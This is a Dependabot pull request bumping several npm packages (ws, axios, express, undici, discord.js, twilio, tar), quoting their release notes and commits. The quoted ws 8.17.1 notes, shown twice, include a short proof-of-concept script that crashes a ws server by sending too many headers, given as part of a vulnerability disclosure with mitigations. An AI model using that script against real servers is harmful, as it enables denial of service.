build(deps): bump the npm_and_yarn group across 4 directories with 8 updates

[dependabot[bot]]

Bumps the npm_and_yarn group with 3 updates in the /integrations-examples/discord directory: tar, undici and discord.js. Bumps the npm_and_yarn group with 4 updates in the /integrations-examples/twilio directory: ws, express, axios and twilio. Bumps the npm_and_yarn group with 3 updates in the /javascript directory: ws, axios and follow-redirects. Bumps the npm_and_yarn group with 3 updates in the /typescript directory: ws, axios and follow-redirects.

Updates tar from 6.2.0 to 6.2.1

Commits

• bef7b1e 6.2.1
• fe8cd57 prevent extraction in excessively deep subfolders
• fe7ebfd remove security.md
• See full diff in compare view

Updates undici from 5.27.2 to 6.13.0

Release notes

Sourced from undici's releases.

v6.13.0

What's Changed

• build(deps): bump node from 9696b26 to ad255c6 in /build by @​dependabot in nodejs/undici#3073
• test: remove only by @​metcoder95 in nodejs/undici#3077
• fix: defer errors with setImmediate by @​ronag in nodejs/undici#3081
• improve DecoratorHandler by @​Uzlopak in nodejs/undici#3079
• chore: removed unused escapeFormDataName by @​mcollina in nodejs/undici#3084
• Mention option to pass streams into FormData by @​JaoodxD in nodejs/undici#3086
• fetch: improve performance of isValidEncodedURL by @​Uzlopak in nodejs/undici#3090
• optimize utf8Decode by @​Uzlopak in nodejs/undici#3085
• refactor: h2 refactoring by @​metcoder95 in nodejs/undici#3082
• Skip the creation of a transform stream in fetch by @​mcollina in nodejs/undici#3093
• fetch: improve performance of urlHasHttpsScheme by @​Uzlopak in nodejs/undici#3094
• fetch: avoid creation of an intermediary ReadableStream by @​KhafraDev in nodejs/undici#3095
• test: duplicate jest unspecific tests to native runner by @​Uzlopak in nodejs/undici#3075
• build(deps): bump node from ad255c6 to 6d0f18a in /build by @​dependabot in nodejs/undici#3096
• fetch: improve performance of isValidHeaderValue by @​Uzlopak in nodejs/undici#3098
• chore: automate releases with pr by @​mweberxyz in nodejs/undici#3089

New Contributors

• @​github-actions made their first contribution in nodejs/undici#3099

Full Changelog: https://github.com/nodejs/undici/compare/v6.12.0...v6.13.0

v6.12.0

What's Changed

• fix: broken test by @​tsctx in nodejs/undici#3045
• fix: http2 header parsing by @​climba03003 in nodejs/undici#3047
• types: fix Request.refererPolicy and RequestInit.refererPolicy are incompatible by @​zbinlin in nodejs/undici#3039
• fix(types): onHeaders always takes headers as an array of buffer by @​ronag in nodejs/undici#3050
• fix: ProxyAgent causes request.headers.host to be forcibly reset by @​1zilc in nodejs/undici#3026
• fallback to Buffer.isUtf8 on platforms without icu by @​KhafraDev in nodejs/undici#3006
• build(deps): bump github/codeql-action from 3.24.6 to 3.24.9 by @​dependabot in nodejs/undici#3037
• build(deps): bump actions/dependency-review-action from 4.1.3 to 4.2.5 by @​dependabot in nodejs/undici#3035
• build(deps): bump node from 577f8eb to 87524df in /build by @​dependabot in nodejs/undici#3055
• build(deps): bump node from 87524df to 9696b26 in /build by @​dependabot in nodejs/undici#3058
• fetch: Block ports 4190 & 6679 by @​KhafraDev in nodejs/undici#3059
• test: activate testing for interceptors and cache by @​Uzlopak in nodejs/undici#3061
• cache: improve test coverage by @​Uzlopak in nodejs/undici#3063
• feat: modernize fuzzing by @​Uzlopak in nodejs/undici#3060
• fix: request abort by @​ronag in nodejs/undici#3056
• fix: signal handling by @​ronag in nodejs/undici#3053
• fix(H2): handle goaway properly by @​metcoder95 in nodejs/undici#3057
• test: client, set body to null if bigger than CHUNK_LIMIT by @​Uzlopak in nodejs/undici#3064
• mock: improve mock interceptor by @​Uzlopak in nodejs/undici#3062
• fix: bad client destroy on servername change by @​ronag in nodejs/undici#3066
• perf: improve isBlobLike by @​Uzlopak in nodejs/undici#3070
• test: add sanity check for llhttp wasm files by @​Uzlopak in nodejs/undici#3068

New Contributors

... (truncated)

Commits

• 65f768c Bumped v6.13.0 (#3099)
• d78ca7a chore: automate releases with pr (#3089)
• ca1dbb8 fetch: improve performance of isValidHeaderValue (#3098)
• c1c0bd6 build(deps): bump node from ad255c6 to 6d0f18a in /build (#3096)
• bccb191 test: duplicate jest unspecific tests to native runner (#3075)
• 8a07bbd fetch: avoid creation of an intermediary ReadableStream (#3095)
• edb3d64 fetch: improve performance of urlHasHttpsScheme (#3094)
• 83a0fb3 Skip the creation of a transform stream in fetch (#3093)
• 2e128c1 refactor: h2 refactoring (#3082)
• 836986d optimize utf8Decode (#3085)
• Additional commits viewable in compare view

Updates discord.js from 14.14.1 to 14.15.3

Release notes

Sourced from discord.js's releases.

14.15.3

Bug Fixes

• Message: Properly compare attachments and embeds (#10282) (a468ae8)
• Throw error on no message id for Message#fetchReference() (#10295) (638b896)
• ThreadChannel: Invalid owner fetch option (#10292) (27d0659)
• Action: Ensure all properties on getChannel() are passed (#10278) (92c1a51)
• docs: Some link tags didn't resolve correctly (#10269) (914cc4b)
• actions: Handle missing poll object (#10266) (7816ec2)

Refactor

• GuildChannelManager: Improve addFollower errors (#10277) (555961b)

Typings

• Forum starter messages do not support polls (#10276) (35207b0)
• Add defaultValues to respective select menu components data (#10265) (c2432d5)

14.15.2

Bug Fixes

• PollAnswer: FetchVoters route changed to MessageManager (#10251) (30d79e8)

14.15.1

Bug Fixes

• MessageManager: Poll methods don't need a channel id (#10249) (0474a43)

14.15.0

Bug Fixes

• Message: Not crosspostable if has a poll (#10246) (a6b9f1b)
• actions: Always emit message create for own messages (#10211) (798f28c)
• Embed: Address equals method issue (#10152) (ddc927f)
• types: Export ReadonlyCollection (#10184) (6cc5fa2)
• Anchor link for events (0efd1be)
• resolveColor: Address case for numbers (#10115) (3755e66)
• Invert deletable message types list (#10093) (42bc5d2)
• BaseClient: Fall back to userAgentAppendix (#10113) (b16647e)
• InteractionResponses: Check if ephemeral message flag is used (#10021) (62e31cb)
• Replace internal calls to Emoji#url (#10025) (941642a)
• Export "ESM" types when discord.js is imported in ESM land (#10009) (e412a22)
• website: Discord-api-types links, URL links and some minor doc issues (#9990) (57c414b)
• website: Cross package deprecated links (#9981) (802ec63)
• Minify mainlib docs json (#9963) (4b88306)
• website: Misc improvements (#9940) (b79351b)

Documentation

... (truncated)

Changelog

Sourced from discord.js's changelog.

14.15.3 - (2024-06-02)

Bug Fixes

• Message: Properly compare attachments and embeds (#10282) (a468ae8)
• Throw error on no message id for Message#fetchReference() (#10295) (638b896)
• ThreadChannel: Invalid owner fetch option (#10292) (27d0659)
• Action: Ensure all properties on getChannel() are passed (#10278) (92c1a51)
• docs: Some link tags didn't resolve correctly (#10269) (914cc4b)
• actions: Handle missing poll object (#10266) (7816ec2)

Refactor

• GuildChannelManager: Improve addFollower errors (#10277) (555961b)

Typings

• Forum starter messages do not support polls (#10276) (35207b0)
• Add defaultValues to respective select menu components data (#10265) (c2432d5)

14.15.2 - (2024-05-05)

Bug Fixes

• PollAnswer: FetchVoters route changed to MessageManager (#10251) (30d79e8)

14.15.1 - (2024-05-04)

Bug Fixes

• MessageManager: Poll methods don't need a channel id (#10249) (0474a43)

14.15.0 - (2024-05-04)

Bug Fixes

• Message: Not crosspostable if has a poll (#10246) (a6b9f1b)
• actions: Always emit message create for own messages (#10211) (798f28c)
• Embed: Address equals method issue (#10152) (ddc927f)
• types: Export ReadonlyCollection (#10184) (6cc5fa2)
• Anchor link for events (0efd1be)
• resolveColor: Address case for numbers (#10115) (3755e66)
• Invert deletable message types list (#10093) (42bc5d2)
• BaseClient: Fall back to userAgentAppendix (#10113) (b16647e)
• InteractionResponses: Check if ephemeral message flag is used (#10021) (62e31cb)
• Replace internal calls to Emoji#url (#10025) (941642a)
• Export "ESM" types when discord.js is imported in ESM land (#10009) (e412a22)
• website: Discord-api-types links, URL links and some minor doc issues (#9990) (57c414b)
• website: Cross package deprecated links (#9981) (802ec63)
• Minify mainlib docs json (#9963) (4b88306)

... (truncated)

Commits

• 311aaf2 chore(release): @​discordjs/builders 1.8.2, @​discordjs/ws 1.1.1, and discord.j...
• a468ae8 fix(Message): properly compare attachments and embeds (#10282)
• 638b896 fix: Throw error on no message id for Message#fetchReference() (#10295)
• 27d0659 fix(ThreadChannel): invalid owner fetch option (#10292)
• 555961b refactor(GuildChannelManager): improve addFollower errors (#10277)
• 92c1a51 fix(Action): Ensure all properties on getChannel() are passed (#10278)
• 35207b0 types: Forum starter messages do not support polls (#10276)
• c2432d5 types: Add defaultValues to respective select menu components data (#10265)
• 914cc4b fix(docs): some link tags didn't resolve correctly (#10269)
• 7816ec2 fix(actions): Handle missing poll object (#10266)
• Additional commits viewable in compare view

Updates ws from 8.14.2 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';

  if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• 934c9d6 [ci] Test on node 22
• 1817bac [ci] Do not test on node 21
• 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
• e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
• Additional commits viewable in compare view

Updates ws from 8.14.0 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

• Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';

  if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

• 3c56601 [dist] 8.17.1
• e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
• 6a00029 [test] Increase code coverage
• ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
• b73b118 [dist] 8.17.0
• 29694a5 [test] Use the highWaterMark variable
• 934c9d6 [ci] Test on node 22
• 1817bac [ci] Do not test on node 21
• 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
• e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
• Additional commits viewable in compare view

Updates express from 4.18.2 to 4.19.2

Release notes

Sourced from express's releases.

4.19.2

What's Changed

• Improved fix for open redirect allow list bypass

Full Changelog: https://github.com/expressjs/express/compare/4.19.1...4.19.2

4.19.1

What's Changed

• Fix ci after location patch by @​wesleytodd in expressjs/express#5552
• fixed un-edited version in history.md for 4.19.0 by @​wesleytodd in expressjs/express#5556

Full Changelog: https://github.com/expressjs/express/compare/4.19.0...4.19.1

4.19.0

What's Changed

• fix typo in release date by @​UlisesGascon in expressjs/express#5527
• docs: nominating @​wesleytodd to be project captian by @​wesleytodd in expressjs/express#5511
• docs: loosen TC activity rules by @​wesleytodd in expressjs/express#5510
• Add note on how to update docs for new release by @​crandmck in expressjs/express#5541
• Prevent open redirect allow list bypass due to encodeurl
• Release 4.19.0 by @​wesleytodd in expressjs/express#5551

New Contributors

• @​crandmck made their first contribution in expressjs/express#5541

Full Changelog: https://github.com/expressjs/express/compare/4.18.3...4.19.0

4.18.3

Main Changes

• Fix routing requests without method
• deps: body-parser@1.20.2
  • Fix strict json error message on Node.js 19+
  • deps: content-type@~1.0.5
  • deps: raw-body@2.5.2

Other Changes

• Use https: protocol instead of deprecated git: protocol by @​vcsjones in expressjs/express#5032
• build: Node.js@16.18 and Node.js@18.12 by @​abenhamdine in expressjs/express#5034
• ci: update actions/checkout to v3 by @​armujahid in expressjs/express#5027
• test: remove unused function arguments in params by @​raksbisht in expressjs/express#5124
• Remove unused originalIndex from acceptParams by @​raksbisht in expressjs/express#5119
• Fixed typos by @​raksbisht in expressjs/express#5117
• examples: remove unused params by @​raksbisht in expressjs/express#5113
• fix: parameter str is not described in JSDoc by @​raksbisht in expressjs/express#5130
• fix: typos in History.md by @​raksbisht in expressjs/express#5131
• build : add Node.js@19.7 by @​abenhamdine in expressjs/express#5028
• test: remove unused function arguments in params by @​raksbisht in expressjs/express#5137

... (truncated)

Changelog

Sourced from express's changelog.

4.19.2 / 2024-03-25

• Improved fix for open redirect allow list bypass

4.19.1 / 2024-03-20

• Allow passing non-strings to res.location with new encoding handling checks

4.19.0 / 2024-03-20

• Prevent open redirect allow list bypass due to encodeurl
• deps: cookie@0.6.0

4.18.3 / 2024-02-29

• Fix routing requests without method
• deps: body-parser@1.20.2
  • Fix strict json error message on Node.js 19+
  • deps: content-type@~1.0.5
  • deps: raw-body@2.5.2
• deps: cookie@0.6.0
  • Add partitioned option

Commits

• 04bc627 4.19.2
• da4d763 Improved fix for open redirect allow list bypass
• 4f0f6cc 4.19.1
• a003cfa Allow passing non-strings to res.location with new encoding handling checks f...
• a1fa90f fixed un-edited version in history.md for 4.19.0
• 11f2b1d build: fix build due to inconsistent supertest behavior in older versions
• 084e365 4.19.0
• 0867302 Prevent open redirect allow list bypass due to encodeurl
• 567c9c6 Add note on how to update docs for new release (#5541)
• 69a4cf2 deps: cookie@0.6.0
• Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by wesleytodd, a new releaser for express since your current version.

Updates axios from 0.26.1 to 1.7.2

Release notes

Sourced from axios's releases.

Release v1.7.2

Release notes:

Bug Fixes

• fetch: enhance fetch API detection; (#6413) (4f79aef)

Contributors to this release

• Dmitriy Mozgovoy

Release v1.7.1

Release notes:

Bug Fixes

• fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#6410) (733f15f)

Contributors to this release

• Dmitriy Mozgovoy

Release v1.7.0

Release notes:

Features

• adapter: add fetch adapter; (#6371) (a3ff99b)

Bug Fixes

• core/axios: handle un-writable error stack (#6362) (81e0455)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Alexandre ABRIOUX

Release v1.7.0-beta.2

Release notes:

Bug Fixes

• fetch: capitalize HTTP method names; (#6395) (ad3174a)
• fetch: fix & optimize progress capturing for cases when the request data has a nullish value or zero data length (#6400) (95a3e8e)
• fetch: fix headers getting from a stream response; (#6401) (870e0a7)

Contributors to this release

• Dmitriy Mozgovoy

Release v1.7.0-beta.1

Release notes:

... (truncated)

Changelog

Sourced from axios's changelog.

1.7.2 (2024-05-21)

Bug Fixes

• fetch: enhance fetch API detection; (#6413) (4f79aef)

Contributors to this release

• Dmitriy Mozgovoy

1.7.1 (2024-05-20)

Bug Fixes

• fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#6410) (733f15f)

Contributors to this release

• Dmitriy Mozgovoy

1.7.0 (2024-05-19)

Features

• adapter: add fetch adapter; (#6371) (a3ff99b)

Bug Fixes

• core/axios: handle un-writable error stack (#6362) (81e0455)

Contributors to this release

• Dmitriy Mozgovoy
• Jay
• Alexandre ABRIOUX

1.7.0-beta.2 (2024-05-19)

Bug Fixes

• fetch: capitalize HTTP method names; (#6395) (ad3174a)
• fetch: fix & optimize progress capturing for cases when the request data has a nullish value or zero data length (#6400) (95a3e8e)
• fetch: fix headers getting from a stream response; (#6401) (870e0a7)

Contributors to this release

... (truncated)

Commits

• 0e4f9fa chore(release): v1.7.2 (#6414)
• 4f79aef fix(fetch): enhance fetch API detection; (#6413)
• 67d1373 chore(release): v1.7.1 (#6411)
• 733f15f fix(fetch): fixed ReferenceError issue when TextEncoder is not available in t...
• 3041c61 [Release] v1.7.0 (#6408)
• 18b13cb chore(docs): add fetch adapter docs; (#6407)
• e62099b fix(fetch): fixed a possible memory leak in the AbortController for the strea...
• b49aa8e chore(release): v1.7.0-beta.2 (#6403)
• d57f03a chore(ci): bump create-pull-request version to fix a bug; (#6405)
• 097b0d1 chore(ci): add tag resolution for npm releases based on package version; (#6404)
• Additional commits viewable in compare view

Updates twilio from 4.17.0 to 4.23.0

Release notes

Sourced from twilio's releases.

4.23.0

Release Notes

Library - Chore

• [PR #1005](twilio/twilio-node#1005): cluster tests enabled. Thanks to @​sbansla!

Api

• remove feedback and feedback summary from call resource

Flex

• Adding routing_properties to Interactions Channels Participant

Lookups

• Add new line_status package to the lookup response
• Remove live_activity package from the lookup response (breaking change)

Messaging

• Add tollfree multiple rejection reasons response array

Trusthub

• Add ENUM for businessRegistrationAuthority in compliance_registration. (breaking change)
• Add new field in isIsvEmbed in compliance_registration.
• Add additional optional fields in compliance_registration for Individual business type.

Twiml

• Add support for new Amazon Polly and Google voices (Q1 2024) for Say verb

Docs

4.22.0

Release Notes

Library - Chore

• [PR #1002](twilio/twilio-node#1002): disable cluster test. Thanks to @​sbansla!
• [PR #1001](twilio/twilio-node#1001): Remove Media V1. Thanks to @​califlower!
• [PR #997](twilio/twilio-node#997): removing oauth and autopilot references. Thanks to @​tiwarishubham635!

Api

• Updated service base url for connect apps and authorized connect apps APIs (breaking change)
• Update documentation to reflect RiskCheck GA
• Added optional parameter CallToken for create participant api

Events

• Marked as GA

Flex

• Adding flex_instance_sid to Flex Configuration
• Adding provisioning_status for Email Manager
• Adding offline_config to Flex Configuration

... (truncated)

Changelog

Sourced from twilio's changelog.

[2024-02-27] Version 4.23.0

Library - Chore

• [PR #1005](twilio/twilio-node#1005): cluster tests enabled. Thanks to @​sbansla!

Api

• remove feedback and feedback summary from call resource

Flex

• Adding routing_properties to Interactions Channels Participant

Lookups

• Add new line_status package to the lookup response
• Remove live_activity package from the lookup response (breaking change)

Messaging

• Add tollfree multiple rejection reasons response array

Trusthub

• Add ENUM for businessRegistrationAuthority in compliance_registration. (breaking change)
• Add new field in isIsvEmbed in compliance_registration.
• Add additional optional fields in compliance_registration for Individual business type.

Twiml

• Add support for new Amazon Polly and Google voices (Q1 2024) for Say verb

[2024-02-09] Version 4.22.0

Library - Chore

• [PR #1002](twilio/twilio-node#1002): disable cluster test. Thanks to @​sbansla!
• [PR #1001](twilio/twilio-node#1001): Remove Media V1. Thanks to @​califlower!
• [PR #997](twilio/twilio-node#997): removing oauth and autopilot references. Thanks to @​tiwarishubham635!

Api

• Updated service base url for connect apps and authorized connect apps APIs (breaking change)
• Update documentation to reflect RiskCheck GA
• Added optional parameter CallToken for create participant api

Events

• Marked as GA

Flex

• Adding flex_instance_sid to Flex Configuration
... _Description has been truncated_

[coderabbitai[bot]]

[!IMPORTANT]

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

---

Thank you for using CodeRabbit. We offer it for free to the OSS community and would appreciate your support in helping us grow. If you find it useful, would you consider giving us a shout-out on your favorite social media?

Share

- [X](https://twitter.com/intent/tweet?text=I%20just%20used%20%40coderabbitai%20for%20my%20code%20review%2C%20and%20it%27s%20fantastic%21%20It%27s%20free%20for%20OSS%20and%20offers%20a%20free%20trial%20for%20the%20proprietary%20code.%20Check%20it%20out%3A&url=https%3A//coderabbit.ai) - [Mastodon](https://mastodon.social/share?text=I%20just%20used%20%40coderabbitai%20for%20my%20code%20review%2C%20and%20it%27s%20fantastic%21%20It%27s%20free%20for%20OSS%20and%20offers%20a%20free%20trial%20for%20the%20proprietary%20code.%20Check%20it%20out%3A%20https%3A%2F%2Fcoderabbit.ai) - [Reddit](https://www.reddit.com/submit?title=Great%20tool%20for%20code%20review%20-%20CodeRabbit&text=I%20just%20used%20CodeRabbit%20for%20my%20code%20review%2C%20and%20it%27s%20fantastic%21%20It%27s%20free%20for%20OSS%20and%20offers%20a%20free%20trial%20for%20proprietary%20code.%20Check%20it%20out%3A%20https%3A//coderabbit.ai) - [LinkedIn](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Fcoderabbit.ai&mini=true&title=Great%20tool%20for%20code%20review%20-%20CodeRabbit&summary=I%20just%20used%20CodeRabbit%20for%20my%20code%20review%2C%20and%20it%27s%20fantastic%21%20It%27s%20free%20for%20OSS%20and%20offers%20a%20free%20trial%20for%20proprietary%20code)

Tips

### Chat There are 3 ways to chat with [CodeRabbit](https://coderabbit.ai): - Review comments: Directly reply to a review comment made by CodeRabbit. Example: - `I pushed a fix in commit .` - `Generate unit testing code for this file.` - `Open a follow-up GitHub issue for this discussion.` - Files and specific lines of code (under the "Files changed" tab): Tag `@coderabbitai` in a new review comment at the desired location with your query. Examples: - `@coderabbitai generate unit testing code for this file.` - `@coderabbitai modularize this function.` - PR comments: Tag `@coderabbitai` in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples: - `@coderabbitai generate interesting stats about this repository and render them as a table.` - `@coderabbitai show all the console.log statements in this repository.` - `@coderabbitai read src/utils.ts and generate unit testing code.` - `@coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.` - `@coderabbitai help me debug CodeRabbit configuration file.` Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments. ### CodeRabbit Commands (invoked as PR comments) - `@coderabbitai pause` to pause the reviews on a PR. - `@coderabbitai resume` to resume the paused reviews. - `@coderabbitai review` to trigger an incremental review. This is useful when automatic reviews are disabled for the repository. - `@coderabbitai full review` to do a full review from scratch and review all the files again. - `@coderabbitai summary` to regenerate the summary of the PR. - `@coderabbitai resolve` resolve all the CodeRabbit review comments. - `@coderabbitai configuration` to show the current CodeRabbit configuration for the repository. - `@coderabbitai help` to get help. Additionally, you can add `@coderabbitai ignore` anywhere in the PR description to prevent this PR from being reviewed. ### CodeRabbit Configration File (`.coderabbit.yaml`) - You can programmatically configure CodeRabbit by adding a `.coderabbit.yaml` file to the root of your repository. - Please see the [configuration documentation](https://docs.coderabbit.ai/guides/configure-coderabbit) for more information. - If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: `# yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json` ### Documentation and Community - Visit our [Documentation](https://coderabbit.ai/docs) for detailed information on how to use CodeRabbit. - Join our [Discord Community](https://discord.com/invite/GsXnASn26c) to get help, request features, and share feedback. - Follow us on [X/Twitter](https://twitter.com/coderabbitai) for updates and announcements.